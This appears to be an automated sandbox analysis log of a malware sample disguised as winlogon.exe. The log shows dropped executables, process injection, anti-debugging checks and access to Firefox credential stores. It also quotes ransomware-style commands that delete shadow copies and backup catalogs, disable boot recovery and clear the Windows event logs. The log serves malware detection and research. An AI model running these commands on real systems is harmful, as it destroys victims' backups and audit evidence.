Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 |
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B |
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security |
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 |
Source: winlogon.exe | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872 |
Source: yegus.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999364306084 |
Source: ucngw.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.995655293367 |
Source: _yig.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree, | 3_2_100147C0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess, | 3_2_10013CB0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb, | 3_2_100145E0 |
Source: C:\Windows\System32\wbadmin.exe | File created: C:\Windows\Logs\WindowsBackup |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7989E | 1_2_00D7989E |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D793F0 | 1_2_00D793F0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6F6CE | 1_2_00D6F6CE |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7CF3F | 1_2_00D7CF3F |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61110 | 1_2_00D61110 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D69330 | 1_2_00D69330 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61870 | 1_2_00D61870 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D68EE0 | 1_2_00D68EE0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01331370 | 2_2_01331370 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_0133E8FF | 2_2_0133E8FF |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013315E0 | 2_2_013315E0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013310A0 | 2_2_013310A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01332B70 | 2_2_01332B70 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013332D0 | 2_2_013332D0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10064140 | 2_2_10064140 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100196A0 | 2_2_100196A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10029130 | 2_2_10029130 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003C880 | 2_2_1003C880 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10053C80 | 2_2_10053C80 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10065870 | 2_2_10065870 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100804F0 | 2_2_100804F0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10027050 | 2_2_10027050 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10006022 | 2_2_10006022 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10007870 | 2_2_10007870 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10005C30 | 2_2_10005C30 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1006F810 | 2_2_1006F810 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10036CD0 | 2_2_10036CD0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003B6A0 | 2_2_1003B6A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10008D50 | 2_2_10008D50 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10079459 | 2_2_10079459 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10022AD0 | 2_2_10022AD0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10078060 | 2_2_10078060 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10017050 | 2_2_10017050 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10002200 | 2_2_10002200 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1002DD28 | 2_2_1002DD28 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10074780 | 2_2_10074780 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10021F80 | 2_2_10021F80 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001EBB0 | 2_2_1001EBB0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001CFF0 | 2_2_1001CFF0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008DE01 | 2_2_1008DE01 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100722E0 | 2_2_100722E0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FC90 | 3_2_00C5FC90 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C60F40 | 3_2_00C60F40 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5D39F | 3_2_00C5D39F |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FD20 | 3_2_00C5FD20 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61150 | 3_2_00C61150 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F3F0 | 3_2_00C5F3F0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F6A0 | 3_2_00C5F6A0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10004950 | 3_2_10004950 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100039B3 | 3_2_100039B3 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000F898 | 3_2_1000F898 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10003C10 | 3_2_10003C10 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000B61E | 3_2_1000B61E |
Source: C:\Users\user\Desktop\winlogon.exe | Process token adjusted: Security |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: String function: 00D6B650 appears 34 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 100071E0 appears 59 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10024C30 appears 105 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10007480 appears 193 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10008070 appears 167 times | |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: String function: 00C51CA0 appears 32 times | |
Source: _wjg.exe.1.dr | Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe |
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\winlogon.exe |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection, | 1_2_00D63920 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle, | 1_2_00D65DD0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B598 SetUnhandledExceptionFilter, | 1_2_00D6B598 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 1_2_00D6AE70 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D6B406 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D7009F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013347F1 SetUnhandledExceptionFilter, | 2_2_013347F1 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_013346A3 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 2_2_013340FB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_013372DB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 2_2_100827CB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_1008657C |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_10083265 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51BE9 SetUnhandledExceptionFilter, | 3_2_00C51BE9 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00C54CBD |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_00C514CB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00C51A54 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_10001795 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_1000662D |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_10001B37 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 4_2_001417EA |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 4_2_0014333B |
Source: C:\Users\user\Desktop\winlogon.exe | System information queried: KernelDebuggerInformation |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D6B406 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath, | 1_2_00D643A0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h] | 1_2_00D70D28 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h] | 2_2_01337F59 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10085756 mov eax, dword ptr fs:[00000030h] | 2_2_10085756 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h] | 3_2_00C558EB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100051BB mov eax, dword ptr fs:[00000030h] | 3_2_100051BB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process token adjusted: Debug |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW, | 1_2_00D75F8F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW, | 2_2_01339A82 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA, | 2_2_10088620 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW, | 3_2_00C5850A |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA, | 3_2_10008EEC |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose, | 4_2_00141441 |
Source: wbadmin.exe | Binary or memory string: Cluster service, and Hyper-V for more information. |
Source: wbadmin.exe | Binary or memory string: An error occurred while preparing to back up Hyper-V data. |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | API call chain: ExitProcess graph end node |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process information queried: ProcessInformation |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle, | 4_2_001412E8 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Thread delayed: delay time: 3600000 |
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe |
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes |
Source: C:\Users\user\Desktop\winlogon.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-13588 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes |
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392 | Thread sleep time: -60000s >= -60000s |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268 | Thread sleep time: -120000s >= -60000s |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300 | Thread sleep time: -3600000s >= -60000s |
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -120000s >= -60000s |
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -60000s >= -60000s |
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep count: 89 > 30 |
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep time: -5340000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep count: 57 > 30 |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -3420000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -60000s >= -60000s |
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep count: 81 > 30 |
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep time: -4860000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle, | 1_2_00D634B0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 2_2_100879B6 |
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |